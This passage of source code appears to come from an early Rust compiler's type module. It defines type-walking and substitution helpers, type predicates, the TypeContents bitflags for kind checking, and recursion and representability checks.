|t| { f(t); true }); } pub fn maybe_walk_ty(ty: t, f: |t| -> bool) { if !f(ty) { return; } match get(ty).sty { ty_nil | ty_bot | ty_bool | ty_char | ty_int(_) | ty_uint(_) | ty_float(_) | ty_str(_) | ty_self(_) | ty_infer(_) | ty_param(_) | ty_err => {} ty_box(ty) | ty_uniq(ty) => maybe_walk_ty(ty, f), ty_vec(ref tm, _) | ty_unboxed_vec(ref tm) | ty_ptr(ref tm) | ty_rptr(_, ref tm) => { maybe_walk_ty(tm.ty, f); } ty_enum(_, ref substs) | ty_struct(_, ref substs) | ty_trait(~TyTrait { ref substs, .. }) => { for subty in (*substs).tps.iter() { maybe_walk_ty(*subty, |x| f(x)); } } ty_tup(ref ts) => { for tt in ts.iter() { maybe_walk_ty(*tt, |x| f(x)); } } ty_bare_fn(ref ft) => { for a in ft.sig.inputs.iter() { maybe_walk_ty(*a, |x| f(x)); } maybe_walk_ty(ft.sig.output, f); } ty_closure(ref ft) => { for a in ft.sig.inputs.iter() { maybe_walk_ty(*a, |x| f(x)); } maybe_walk_ty(ft.sig.output, f); } } } // Folds types from the bottom up. pub fn fold_ty(cx: &ctxt, t0: t, fldop: |t| -> t) -> t { let mut f = ty_fold::BottomUpFolder {tcx: cx, fldop: fldop}; f.fold_ty(t0) } pub fn walk_regions_and_ty(cx: &ctxt, ty: t, fldr: |r: Region|, fldt: |t: t|) -> t { ty_fold::RegionFolder::general(cx, |r| { fldr(r); r }, |t| { fldt(t); t }).fold_ty(ty) } pub fn fold_regions(cx: &ctxt, ty: t, fldr: |r: Region| -> Region) -> t { ty_fold::RegionFolder::regions(cx, fldr).fold_ty(ty) } // Substitute *only* type parameters. Used in trans where regions are erased. pub fn subst_tps(tcx: &ctxt, tps: &[t], self_ty_opt: Option<t>, typ: t) -> t { let mut subst = TpsSubst { tcx: tcx, self_ty_opt: self_ty_opt, tps: tps }; return subst.fold_ty(typ); struct TpsSubst<'a> { tcx: &'a ctxt, self_ty_opt: Option<t>, tps: &'a [t], } impl<'a> TypeFolder for TpsSubst<'a> { fn tcx<'a>(&'a self) -> &'a ctxt { self.tcx } fn fold_ty(&mut self, t: ty::t) -> ty::t { if self.tps.len() == 0u && self.self_ty_opt.is_none() { return t; } let tb = ty::get(t); if self.self_ty_opt.is_none() && !tbox_has_flag(tb, has_params) { return t; } match ty::get(t).sty { ty_param(p) => { self.tps[p.idx] } ty_self(_) => { match self.self_ty_opt { None => self.tcx.sess.bug("ty_self unexpected here"), Some(self_ty) => self_ty } } _ => { ty_fold::super_fold_ty(self, t) } } } } } pub fn substs_is_noop(substs: &substs) -> bool { let regions_is_noop = match substs.regions { ErasedRegions => false, // may be used to canonicalize NonerasedRegions(ref regions) => regions.is_empty() }; substs.tps.len() == 0u && regions_is_noop && substs.self_ty.is_none() } pub fn substs_to_str(cx: &ctxt, substs: &substs) -> ~str { substs.repr(cx) } pub fn subst(cx: &ctxt, substs: &substs, typ: t) -> t { typ.subst(cx, substs) } // Type utilities pub fn type_is_nil(ty: t) -> bool { get(ty).sty == ty_nil } pub fn type_is_bot(ty: t) -> bool { (get(ty).flags & (has_ty_bot as uint)) != 0 } pub fn type_is_error(ty: t) -> bool { (get(ty).flags & (has_ty_err as uint)) != 0 } pub fn type_needs_subst(ty: t) -> bool { tbox_has_flag(get(ty), needs_subst) } pub fn trait_ref_contains_error(tref: &ty::TraitRef) -> bool { tref.substs.self_ty.iter().any(|&t| type_is_error(t)) || tref.substs.tps.iter().any(|&t| type_is_error(t)) } pub fn type_is_ty_var(ty: t) -> bool { match get(ty).sty { ty_infer(TyVar(_)) => true, _ => false } } pub fn type_is_bool(ty: t) -> bool { get(ty).sty == ty_bool } pub fn type_is_self(ty: t) -> bool { match get(ty).sty { ty_self(..) => true, _ => false } } pub fn type_is_structural(ty: t) -> bool { match get(ty).sty { ty_struct(..) | ty_tup(_) | ty_enum(..) | ty_closure(_) | ty_trait(..) | ty_vec(_, vstore_fixed(_)) | ty_str(vstore_fixed(_)) | ty_vec(_, vstore_slice(_)) | ty_str(vstore_slice(_)) => true, _ => false } } pub fn type_is_sequence(ty: t) -> bool { match get(ty).sty { ty_str(_) | ty_vec(_, _) => true, _ => false } } pub fn type_is_simd(cx: &ctxt, ty: t) -> bool { match get(ty).sty { ty_struct(did, _) => lookup_simd(cx, did), _ => false } } pub fn type_is_str(ty: t) -> bool { match get(ty).sty { ty_str(_) => true, _ => false } } pub fn sequence_element_type(cx: &ctxt, ty: t) -> t { match get(ty).sty { ty_str(_) => return mk_mach_uint(ast::TyU8), ty_vec(mt, _) | ty_unboxed_vec(mt) => return mt.ty, _ => cx.sess.bug("sequence_element_type called on non-sequence value"), } } pub fn simd_type(cx: &ctxt, ty: t) -> t { match get(ty).sty { ty_struct(did, ref substs) => { let fields = lookup_struct_fields(cx, did); lookup_field_type(cx, did, fields.get(0).id, substs) } _ => fail!("simd_type called on invalid type") } } pub fn simd_size(cx: &ctxt, ty: t) -> uint { match get(ty).sty { ty_struct(did, _) => { let fields = lookup_struct_fields(cx, did); fields.len() } _ => fail!("simd_size called on invalid type") } } pub fn get_element_type(ty: t, i: uint) -> t { match get(ty).sty { ty_tup(ref ts) => return *ts.get(i), _ => fail!("get_element_type called on invalid type") } } pub fn type_is_box(ty: t) -> bool { match get(ty).sty { ty_box(_) => return true, _ => return false } } pub fn type_is_boxed(ty: t) -> bool { match get(ty).sty { ty_box(_) => true, _ => false } } pub fn type_is_region_ptr(ty: t) -> bool { match get(ty).sty { ty_rptr(_, _) => true, _ => false } } pub fn type_is_slice(ty: t) -> bool { match get(ty).sty { ty_vec(_, vstore_slice(_)) | ty_str(vstore_slice(_)) => true, _ => return false } } pub fn type_is_unique_box(ty: t) -> bool { match get(ty).sty { ty_uniq(_) => return true, _ => return false } } pub fn type_is_unsafe_ptr(ty: t) -> bool { match get(ty).sty { ty_ptr(_) => return true, _ => return false } } pub fn type_is_vec(ty: t) -> bool { return match get(ty).sty { ty_vec(_, _) | ty_unboxed_vec(_) => true, ty_str(_) => true, _ => false }; } pub fn type_is_unique(ty: t) -> bool { match get(ty).sty { ty_uniq(_) | ty_vec(_, vstore_uniq) | ty_str(vstore_uniq) => true, _ => false } } /* A scalar type is one that denotes an atomic datum, with no sub-components. (A ty_ptr is scalar because it represents a non-managed pointer, so its contents are abstract to rustc.) */ pub fn type_is_scalar(ty: t) -> bool { match get(ty).sty { ty_nil | ty_bool | ty_char | ty_int(_) | ty_float(_) | ty_uint(_) | ty_infer(IntVar(_)) | ty_infer(FloatVar(_)) | ty_bare_fn(..) | ty_ptr(_) => true, _ => false } } pub fn type_needs_drop(cx: &ctxt, ty: t) -> bool { type_contents(cx, ty).needs_drop(cx) } // Some things don't need cleanups during unwinding because the // task can free them all at once later. Currently only things // that only contain scalars and shared boxes can avoid unwind // cleanups. pub fn type_needs_unwind_cleanup(cx: &ctxt, ty: t) -> bool { match cx.needs_unwind_cleanup_cache.borrow().find(&ty) { Some(&result) => return result, None => () } let mut tycache = HashSet::new(); let needs_unwind_cleanup = type_needs_unwind_cleanup_(cx, ty, &mut tycache, false); cx.needs_unwind_cleanup_cache.borrow_mut().insert(ty, needs_unwind_cleanup); return needs_unwind_cleanup; } fn type_needs_unwind_cleanup_(cx: &ctxt, ty: t, tycache: &mut HashSet<t>, encountered_box: bool) -> bool { // Prevent infinite recursion if !tycache.insert(ty) { return false; } let mut encountered_box = encountered_box; let mut needs_unwind_cleanup = false; maybe_walk_ty(ty, |ty| { let old_encountered_box = encountered_box; let result = match get(ty).sty { ty_box(_) => { encountered_box = true; true } ty_nil | ty_bot | ty_bool | ty_int(_) | ty_uint(_) | ty_float(_) | ty_tup(_) | ty_ptr(_) => { true } ty_enum(did, ref substs) => { for v in (*enum_variants(cx, did)).iter() { for aty in v.args.iter() { let t = subst(cx, substs, *aty); needs_unwind_cleanup |= type_needs_unwind_cleanup_(cx, t, tycache, encountered_box); } } !needs_unwind_cleanup } ty_uniq(_) | ty_str(vstore_uniq) | ty_vec(_, vstore_uniq) => { // Once we're inside a box, the annihilator will find // it and destroy it. if !encountered_box { needs_unwind_cleanup = true; false } else { true } } _ => { needs_unwind_cleanup = true; false } }; encountered_box = old_encountered_box; result }); return needs_unwind_cleanup; } /** * Type contents is how the type checker reasons about kinds. * They track what kinds of things are found within a type. You can * think of them as kind of an "anti-kind". They track the kinds of values * and thinks that are contained in types. Having a larger contents for * a type tends to rule that type *out* from various kinds. For example, * a type that contains a reference is not sendable. * * The reason we compute type contents and not kinds is that it is * easier for me (nmatsakis) to think about what is contained within * a type than to think about what is *not* contained within a type. */ pub struct TypeContents { bits: u64 } macro_rules! def_type_content_sets( (mod $mname:ident { $($name:ident = $bits:expr),+ }) => { mod $mname { use middle::ty::TypeContents; $(pub static $name: TypeContents = TypeContents { bits: $bits };)+ } } ) def_type_content_sets!( mod TC { None = 0b0000_0000__0000_0000__0000, // Things that are interior to the value (first nibble): InteriorUnsized = 0b0000_0000__0000_0000__0001, InteriorUnsafe = 0b0000_0000__0000_0000__0010, // InteriorAll = 0b00000000__00000000__1111, // Things that are owned by the value (second and third nibbles): OwnsOwned = 0b0000_0000__0000_0001__0000, OwnsDtor = 0b0000_0000__0000_0010__0000, OwnsManaged /* see [1] below */ = 0b0000_0000__0000_0100__0000, OwnsAffine = 0b0000_0000__0000_1000__0000, OwnsAll = 0b0000_0000__1111_1111__0000, // Things that are reachable by the value in any way (fourth nibble): ReachesNonsendAnnot = 0b0000_0001__0000_0000__0000, ReachesBorrowed = 0b0000_0010__0000_0000__0000, // ReachesManaged /* see [1] below */ = 0b0000_0100__0000_0000__0000, ReachesMutable = 0b0000_1000__0000_0000__0000, ReachesNoShare = 0b0001_0000__0000_0000__0000, ReachesAll = 0b0001_1111__0000_0000__0000, // Things that cause values to *move* rather than *copy* Moves = 0b0000_0000__0000_1011__0000, // Things that mean drop glue is necessary NeedsDrop = 0b0000_0000__0000_0111__0000, // Things that prevent values from being sent // // Note: For checking whether something is sendable, it'd // be sufficient to have ReachesManaged. However, we include // both ReachesManaged and OwnsManaged so that when // a parameter has a bound T:Send, we are able to deduce // that it neither reaches nor owns a managed pointer. Nonsendable = 0b0000_0111__0000_0100__0000, // Things that prevent values from being considered 'static Nonstatic = 0b0000_0010__0000_0000__0000, // Things that prevent values from being considered sized Nonsized = 0b0000_0000__0000_0000__0001, // Things that prevent values from being shared Nonsharable = 0b0001_0000__0000_0000__0000, // Things that make values considered not POD (would be same // as `Moves`, but for the fact that managed data `@` is // not considered POD) Noncopy = 0b0000_0000__0000_1111__0000, // Bits to set when a managed value is encountered // // [1] Do not set the bits TC::OwnsManaged or // TC::ReachesManaged directly, instead reference // TC::Managed to set them both at once. Managed = 0b0000_0100__0000_0100__0000, // All bits All = 0b1111_1111__1111_1111__1111 } ) impl TypeContents { pub fn meets_bounds(&self, cx: &ctxt, bbs: BuiltinBounds) -> bool { bbs.iter().all(|bb| self.meets_bound(cx, bb)) } pub fn meets_bound(&self, cx: &ctxt, bb: BuiltinBound) -> bool { match bb { BoundStatic => self.is_static(cx), BoundSend => self.is_sendable(cx), BoundSized => self.is_sized(cx), BoundCopy => self.is_copy(cx), BoundShare => self.is_sharable(cx), } } pub fn when(&self, cond: bool) -> TypeContents { if cond {*self} else {TC::None} } pub fn intersects(&self, tc: TypeContents) -> bool { (self.bits & tc.bits) != 0 } pub fn is_static(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonstatic) } pub fn is_sendable(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsendable) } pub fn is_sharable(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsharable) } pub fn owns_managed(&self) -> bool { self.intersects(TC::OwnsManaged) } pub fn owns_owned(&self) -> bool { self.intersects(TC::OwnsOwned) } pub fn is_sized(&self, _: &ctxt) -> bool { !self.intersects(TC::Nonsized) } pub fn is_copy(&self, _: &ctxt) -> bool { !self.intersects(TC::Noncopy) } pub fn interior_unsafe(&self) -> bool { self.intersects(TC::InteriorUnsafe) } pub fn moves_by_default(&self, _: &ctxt) -> bool { self.intersects(TC::Moves) } pub fn needs_drop(&self, _: &ctxt) -> bool { self.intersects(TC::NeedsDrop) } pub fn owned_pointer(&self) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a `~` pointer */ TC::OwnsOwned | ( *self & (TC::OwnsAll | TC::ReachesAll)) } pub fn reference(&self, bits: TypeContents) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a reference (`&`) */ bits | ( *self & TC::ReachesAll) } pub fn managed_pointer(&self) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through a managed pointer (`@`) */ TC::Managed | ( *self & TC::ReachesAll) } pub fn unsafe_pointer(&self) -> TypeContents { /*! * Includes only those bits that still apply * when indirected through an unsafe pointer (`*`) */ *self & TC::ReachesAll } pub fn union<T>(v: &[T], f: |&T| -> TypeContents) -> TypeContents { v.iter().fold(TC::None, |tc, t| tc | f(t)) } pub fn inverse(&self) -> TypeContents { TypeContents { bits: !self.bits } } pub fn has_dtor(&self) -> bool { self.intersects(TC::OwnsDtor) } } impl ops::BitOr<TypeContents,TypeContents> for TypeContents { fn bitor(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits | other.bits} } } impl ops::BitAnd<TypeContents,TypeContents> for TypeContents { fn bitand(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits & other.bits} } } impl ops::Sub<TypeContents,TypeContents> for TypeContents { fn sub(&self, other: &TypeContents) -> TypeContents { TypeContents {bits: self.bits & !other.bits} } } impl fmt::Show for TypeContents { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "TypeContents({:t})", self.bits) } } pub fn type_has_dtor(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).has_dtor() } pub fn type_is_static(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).is_static(cx) } pub fn type_is_sendable(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).is_sendable(cx) } pub fn type_interior_is_unsafe(cx: &ctxt, t: ty::t) -> bool { type_contents(cx, t).interior_unsafe() } pub fn type_contents(cx: &ctxt, ty: t) -> TypeContents { let ty_id = type_id(ty); match cx.tc_cache.borrow().find(&ty_id) { Some(tc) => { return *tc; } None => {} } let mut cache = HashMap::new(); let result = tc_ty(cx, ty, &mut cache); cx.tc_cache.borrow_mut().insert(ty_id, result); return result; fn tc_ty(cx: &ctxt, ty: t, cache: &mut HashMap<uint, TypeContents>) -> TypeContents { // Subtle: Note that we are *not* using cx.tc_cache here but rather a // private cache for this walk. This is needed in the case of cyclic // types like: // // struct List { next: ~Option<List>, ... } // // When computing the type contents of such a type, we wind up deeply // recursing as we go. So when we encounter the recursive reference // to List, we temporarily use TC::None as its contents. Later we'll // patch up the cache with the correct value, once we've computed it // (this is basically a co-inductive process, if that helps). So in // the end we'll compute TC::OwnsOwned, in this case. // // The problem is, as we are doing the computation, we will also // compute an *intermediate* contents for, e.g., Option<List> of // TC::None. This is ok during the computation of List itself, but if // we stored this intermediate value into cx.tc_cache, then later // requests for the contents of Option<List> would also yield TC::None // which is incorrect. This value was computed based on the crutch // value for the type contents of list. The correct value is // TC::OwnsOwned. This manifested as issue #4821. let ty_id = type_id(ty); match cache.find(&ty_id) { Some(tc) => { return *tc; } None => {} } match cx.tc_cache.borrow().find(&ty_id) { // Must check both caches! Some(tc) => { return *tc; } None => {} } cache.insert(ty_id, TC::None); let result = match get(ty).sty { // Scalar and unique types are sendable, and durable ty_nil | ty_bot | ty_bool | ty_int(_) | ty_uint(_) | ty_float(_) | ty_bare_fn(_) | ty::ty_char => { TC::None } ty_str(vstore_uniq) => { TC::OwnsOwned } ty_closure(ref c) => { closure_contents(cx, *c) } ty_box(typ) => { tc_ty(cx, typ, cache).managed_pointer() } ty_uniq(typ) => { tc_ty(cx, typ, cache).owned_pointer() } ty_trait(~ty::TyTrait { store, mutability, bounds, .. }) => { object_contents(cx, store, mutability, bounds) } ty_ptr(ref mt) => { tc_ty(cx, mt.ty, cache).unsafe_pointer() } ty_rptr(r, ref mt) => { tc_ty(cx, mt.ty, cache).reference( borrowed_contents(r, mt.mutbl)) } ty_vec(mt, vstore_uniq) => { tc_mt(cx, mt, cache).owned_pointer() } ty_vec(ref mt, vstore_slice(r)) => { tc_ty(cx, mt.ty, cache).reference( borrowed_contents(r, mt.mutbl)) } ty_vec(mt, vstore_fixed(_)) => { tc_mt(cx, mt, cache) } ty_str(vstore_slice(r)) => { borrowed_contents(r, ast::MutImmutable) } ty_str(vstore_fixed(_)) => { TC::None } ty_struct(did, ref substs) => { let flds = struct_fields(cx, did, substs); let mut res = TypeContents::union(flds.as_slice(), |f| tc_mt(cx, f.mt, cache)); if ty::has_dtor(cx, did) { res = res | TC::OwnsDtor; } apply_lang_items(cx, did, res) } ty_tup(ref tys) => { TypeContents::union(tys.as_slice(), |ty| tc_ty(cx, *ty, cache)) } ty_enum(did, ref substs) => { let variants = substd_enum_variants(cx, did, substs); let res = TypeContents::union(variants.as_slice(), |variant| { TypeContents::union(variant.args.as_slice(), |arg_ty| { tc_ty(cx, *arg_ty, cache) }) }); apply_lang_items(cx, did, res) } ty_param(p) => { // We only ever ask for the kind of types that are defined in // the current crate; therefore, the only type parameters that // could be in scope are those defined in the current crate. // If this assertion failures, it is likely because of a // failure in the cross-crate inlining code to translate a // def-id. assert_eq!(p.def_id.krate, ast::LOCAL_CRATE); let ty_param_defs = cx.ty_param_defs.borrow(); let tp_def = ty_param_defs.get(&p.def_id.node); kind_bounds_to_contents(cx, tp_def.bounds.builtin_bounds, tp_def.bounds.trait_bounds.as_slice()) } ty_self(def_id) => { // FIXME(#4678)---self should just be a ty param // Self may be bounded if the associated trait has builtin kinds // for supertraits. If so we can use those bounds. let trait_def = lookup_trait_def(cx, def_id); let traits = [trait_def.trait_ref]; kind_bounds_to_contents(cx, trait_def.bounds, traits) } ty_infer(_) => { // This occurs during coherence, but shouldn't occur at other // times. TC::All } ty_unboxed_vec(mt) => TC::InteriorUnsized | tc_mt(cx, mt, cache), ty_err => { cx.sess.bug("asked to compute contents of error type"); } }; cache.insert(ty_id, result); return result; } fn tc_mt(cx: &ctxt, mt: mt, cache: &mut HashMap<uint, TypeContents>) -> TypeContents { let mc = TC::ReachesMutable.when(mt.mutbl == MutMutable); mc | tc_ty(cx, mt.ty, cache) } fn apply_lang_items(cx: &ctxt, did: ast::DefId, tc: TypeContents) -> TypeContents { if Some(did) == cx.lang_items.no_send_bound() { tc | TC::ReachesNonsendAnnot } else if Some(did) == cx.lang_items.managed_bound() { tc | TC::Managed } else if Some(did) == cx.lang_items.no_copy_bound() { tc | TC::OwnsAffine } else if Some(did) == cx.lang_items.no_share_bound() { tc | TC::ReachesNoShare } else if Some(did) == cx.lang_items.unsafe_type() { tc | TC::InteriorUnsafe } else { tc } } fn borrowed_contents(region: ty::Region, mutbl: ast::Mutability) -> TypeContents { /*! * Type contents due to containing a reference * with the region `region` and borrow kind `bk` */ let b = match mutbl { ast::MutMutable => TC::ReachesMutable | TC::OwnsAffine, ast::MutImmutable => TC::None, }; b | (TC::ReachesBorrowed).when(region != ty::ReStatic) } fn closure_contents(cx: &ctxt, cty: &ClosureTy) -> TypeContents { // Closure contents are just like trait contents, but with potentially // even more stuff. let st = match cty.sigil { ast::BorrowedSigil => object_contents(cx, RegionTraitStore(cty.region), MutMutable, cty.bounds), ast::OwnedSigil => object_contents(cx, UniqTraitStore, MutImmutable, cty.bounds), ast::ManagedSigil => unreachable!() }; // FIXME(#3569): This borrowed_contents call should be taken care of in // object_contents, after ~Traits and @Traits can have region bounds too. // This one here is redundant for &fns but important for ~fns and @fns. let rt = borrowed_contents(cty.region, ast::MutImmutable); // This also prohibits "@once fn" from being copied, which allows it to // be called. Neither way really makes much sense. let ot = match cty.onceness { ast::Once => TC::OwnsAffine, ast::Many => TC::None, }; st | rt | ot } fn object_contents(cx: &ctxt, store: TraitStore, mutbl: ast::Mutability, bounds: BuiltinBounds) -> TypeContents { // These are the type contents of the (opaque) interior let contents = TC::ReachesMutable.when(mutbl == ast::MutMutable) | kind_bounds_to_contents(cx, bounds, []); match store { UniqTraitStore => { contents.owned_pointer() } RegionTraitStore(r) => { contents.reference(borrowed_contents(r, mutbl)) } } } fn kind_bounds_to_contents(cx: &ctxt, bounds: BuiltinBounds, traits: &[@TraitRef]) -> TypeContents { let _i = indenter(); let mut tc = TC::All; each_inherited_builtin_bound(cx, bounds, traits, |bound| { tc = tc - match bound { BoundStatic => TC::Nonstatic, BoundSend => TC::Nonsendable, BoundSized => TC::Nonsized, BoundCopy => TC::Noncopy, BoundShare => TC::Nonsharable, }; }); return tc; // Iterates over all builtin bounds on the type parameter def, including // those inherited from traits with builtin-kind-supertraits. fn each_inherited_builtin_bound(cx: &ctxt, bounds: BuiltinBounds, traits: &[@TraitRef], f: |BuiltinBound|) { for bound in bounds.iter() { f(bound); } each_bound_trait_and_supertraits(cx, traits, |trait_ref| { let trait_def = lookup_trait_def(cx, trait_ref.def_id); for bound in trait_def.bounds.iter() { f(bound); } true }); } } } pub fn type_moves_by_default(cx: &ctxt, ty: t) -> bool { type_contents(cx, ty).moves_by_default(cx) } // True if instantiating an instance of `r_ty` requires an instance of `r_ty`. pub fn is_instantiable(cx: &ctxt, r_ty: t) -> bool { fn type_requires(cx: &ctxt, seen: &mut Vec<DefId>, r_ty: t, ty: t) -> bool { debug!("type_requires({}, {})?", ::util::ppaux::ty_to_str(cx, r_ty), ::util::ppaux::ty_to_str(cx, ty)); let r = { get(r_ty).sty == get(ty).sty || subtypes_require(cx, seen, r_ty, ty) }; debug!("type_requires({}, {})? {}", ::util::ppaux::ty_to_str(cx, r_ty), ::util::ppaux::ty_to_str(cx, ty), r); return r; } fn subtypes_require(cx: &ctxt, seen: &mut Vec<DefId>, r_ty: t, ty: t) -> bool { debug!("subtypes_require({}, {})?", ::util::ppaux::ty_to_str(cx, r_ty), ::util::ppaux::ty_to_str(cx, ty)); let r = match get(ty).sty { // fixed length vectors need special treatment compared to // normal vectors, since they don't necessarily have the // possibilty to have length zero. ty_vec(_, vstore_fixed(0)) => false, // don't need no contents ty_vec(mt, vstore_fixed(_)) => type_requires(cx, seen, r_ty, mt.ty), ty_nil | ty_bot | ty_bool | ty_char | ty_int(_) | ty_uint(_) | ty_float(_) | ty_str(_) | ty_bare_fn(_) | ty_closure(_) | ty_infer(_) | ty_err | ty_param(_) | ty_self(_) | ty_vec(_, _) | ty_unboxed_vec(_) => { false } ty_box(typ) | ty_uniq(typ) => { type_requires(cx, seen, r_ty, typ) } ty_rptr(_, ref mt) => { type_requires(cx, seen, r_ty, mt.ty) } ty_ptr(..) => { false // unsafe ptrs can always be NULL } ty_trait(..) => { false } ty_struct(ref did, _) if seen.contains(did) => { false } ty_struct(did, ref substs) => { seen.push(did); let fields = struct_fields(cx, did, substs); let r = fields.iter().any(|f| type_requires(cx, seen, r_ty, f.mt.ty)); seen.pop().unwrap(); r } ty_tup(ref ts) => { ts.iter().any(|t| type_requires(cx, seen, r_ty, *t)) } ty_enum(ref did, _) if seen.contains(did) => { false } ty_enum(did, ref substs) => { seen.push(did); let vs = enum_variants(cx, did); let r = !vs.is_empty() && vs.iter().all(|variant| { variant.args.iter().any(|aty| { let sty = subst(cx, substs, *aty); type_requires(cx, seen, r_ty, sty) }) }); seen.pop().unwrap(); r } }; debug!("subtypes_require({}, {})? {}", ::util::ppaux::ty_to_str(cx, r_ty), ::util::ppaux::ty_to_str(cx, ty), r); return r; } let mut seen = Vec::new(); !subtypes_require(cx, &mut seen, r_ty, r_ty) } /// Describes whether a type is representable. For types that are not /// representable, 'SelfRecursive' and 'ContainsRecursive' are used to /// distinguish between types that are recursive with themselves and types that /// contain a different recursive type. These cases can therefore be treated /// differently when reporting errors. #[deriving(Eq)] pub enum Representability { Representable, SelfRecursive, ContainsRecursive, } /// Check whether a type is representable. This means it cannot contain unboxed /// structural recursion. This check is needed for structs and enums. pub fn is_type_representable(cx: &ctxt, ty: t) -> Representability { // Iterate until something non-representable is found fn find_nonrepresentable<It: Iterator<t>>(cx: &ctxt, seen: &mut Vec<DefId>, mut iter: It) -> Representability { for ty in iter { let r = type_structurally_recursive(cx, seen, ty); if r != Representable { return r } } Representable } // Does the type `ty` directly (without indirection through a pointer) // contain any types on stack `seen`? fn type_structurally_recursive(cx: &ctxt, seen: &mut Vec<DefId>, ty: t) -> Representability { debug!("type_structurally_recursive: {}", ::util::ppaux::ty_to_str(cx, ty)); // Compare current type to previously seen types match get(ty).sty { ty_struct(did, _) | ty_enum(did, _) => { for (i, &seen_did) in seen.iter().enumerate() { if did == seen_did { return if i == 0 { SelfRecursive } else { ContainsRecursive } } } } _ => (), } // Check inner types match get(ty).sty { // Tuples ty_tup(ref ts) => { find_nonrepresentable(cx, seen, ts.iter().map(|t| *t)) } // Fixed-length vectors. // FIXME(#11924) Behavior undecided for zero-length vectors. ty_vec(mt, vstore_fixed(_)) => { type_structurally_recursive(cx, seen, mt.ty) } // Push struct and enum def-ids onto `seen` before recursing. ty_struct(did, ref substs) => { seen.push(did); let fields = struct_fields(cx, did, substs); let r = find_nonrepresentable(cx, seen, fields.iter().map(|f| f.mt.ty)); seen.pop(); r } ty_enum(did, ref substs) => { seen.push(did); let vs = enum_variants(cx, did); let mut r = Representable; for variant in vs.iter() { let iter = variant.args.iter().map(|aty| subst(cx, substs, *aty)); r = find_nonrepresentable(cx, seen, iter); if r != Representable { break } } seen.pop(); r } _ => Representable, } } debug!("is_type_representable: {}", ::util::ppaux::ty_to_str(cx, ty)); // To avoid a stack overflow when checking an enum variant or struct that // contains a different, structurally recursive type, maintain a stack // of seen types and check recursion for each of them (issues #3008, #3779). let mut seen: Vec<DefId> = Vec::new(); type_structurally_recursive(cx, &mut seen, ty) } pub fn type_is_trait(ty: t) -> bool { match get(ty).sty { ty_trait(..) => true, _ => false } } pub fn type_is_integral(ty: t) -> bool { match get(ty).sty { ty_infer(IntVar(_)) | ty_int(_) | ty_uint(_) => true, _ => false } } pub fn type_is_char(ty: t) -> bool { match get(ty).sty { ty_char => true, _ => false } } pub fn type_is_bare_fn(ty: t) -> bool { match get(ty).sty { ty_bare_fn(..) => true, _ => false } } pub fn type_is_fp(ty: t) -> bool { match get(ty).sty { ty_infer(FloatVar(_)) | ty_float(_) => true, _ => false } } pub fn type_is_numeric(ty: t) -> bool { return type_is_integral(ty) || type_is_fp(ty); } pub fn type_is_signed(ty: t) -> bool { match get(ty).sty { ty_int(_) => true, _ => false } } pub fn type_is_machine(ty: t) -> bool { match get(ty).sty { ty_int(ast::TyI) | ty_uint(ast::TyU) => false, ty_int(..) | ty_uint(..) | ty_float(..) => true, _ => false } } pub fn type_is_enum(ty: t) -> bool { match get(ty).sty { ty_enum(_, _) => return true, _ => return false } } // Is the type's representation size known at compile time? pub fn type_is_sized(cx: &ctxt, ty: ty::t) -> bool { match get(ty).sty { // FIXME(#6308) add trait, vec, str, etc here. ty_param(p) => { let ty_param_defs = cx.ty_param_defs.borrow(); let param_def = ty_param_defs.get(&p.def_id.node); if param_def.bounds.builtin_bounds.contains_elem(BoundSized) { return true; } return false; }, _ => return true, } } // Whether a type is enum like, that is an enum type with only nullary // constructors pub fn type_is_c_like_enum(cx: &ctxt, ty: t) -> bool { match get(ty).sty { ty_enum(did, _) => { let variants = enum_variants(cx, did); if variants.len() == 0 { false } else { variants.iter().all(|v| v.args.len() == 0) } } _ => false } } pub fn type_param(ty: t) -> Option<uint> { match get(ty).sty { ty_param(p) => return Some(p.idx), _ => {/* fall through */ } } return None; } // Returns the type and mutability of *t. // // The parameter `explicit` indicates if this is an *explicit* dereference. // Some types---notably unsafe ptrs---can only be dereferenced explicitly. pub fn deref(t: t, explicit: bool) -> Option<mt> { match get(t).sty { ty_box(typ) | ty_uniq(typ) => Some(mt { ty: typ, mutbl: ast::MutImmutable, }), ty_rptr(_, mt) => Some(mt), ty_ptr(mt) if explicit => Some(mt), _ => None } } // Returns the type and mutability of t[i] pub fn index(t: t) -> Option<mt> { match get(t).sty { ty_vec(mt, _) => Some(mt), ty_str(_) => Some(mt {ty: mk_u8(), mutbl: ast::MutImmutable}), _ => None } } pub fn node_id_to_trait_ref(cx: &ctxt, id: ast::NodeId) -> @ty::TraitRef { match cx.trait_refs.borrow().find(&id) { Some(&t) => t, None => cx.sess.bug( format!("node_id_to_trait_ref: no trait ref for node `{}`", cx.map.node_to_str(id))) } } pub fn try_node_id_to_type(cx: &ctxt, id: ast::NodeId) -> Option<t> { cx.node_types.borrow().find_copy(&(id as uint)) } pub fn node_id_to_type(cx: &ctxt, id: ast::NodeId) -> t { match try_node_id_to_type(cx, id) { Some(t) => t, None => cx.sess.bug( format!("node_id_to_type: no type for node `{}`", cx.map.node_to_str(id))) } } pub fn node_id_to_type_opt(cx: &ctxt, id: ast::NodeId) -> Option<t> { match cx.node_types.borrow().find(&(id as uint)) { Some(&t) => Some(t), None => None } } // FIXME(pcwalton): Makes a copy, bleh. Probably better to not do that. pub fn node_id_to_type_params(cx: &ctxt, id: ast::NodeId) -> Vec<t> { match cx.node_type_substs.borrow().find(&id) { None => return Vec::new(), Some(ts) => return (*ts).clone(), } } fn node_id_has_type_params(cx: &ctxt, id: ast::NodeId) -> bool { cx.node_type_substs.borrow().contains_key(&id) } pub fn fn_is_variadic(fty: t) -> bool { match get(fty).sty { ty_bare_fn(ref f) => f.sig.variadic, ty_closure(ref f) => f.sig.variadic, ref s => { fail!("fn_is_variadic() called on non-fn type: {:?}", s) } } } pub fn ty_fn_sig(fty: t) -> FnSig { match get(fty).sty { ty_bare_fn(ref f) => f.sig.clone(), ty_closure(ref f) => f.sig.clone(), ref s => { 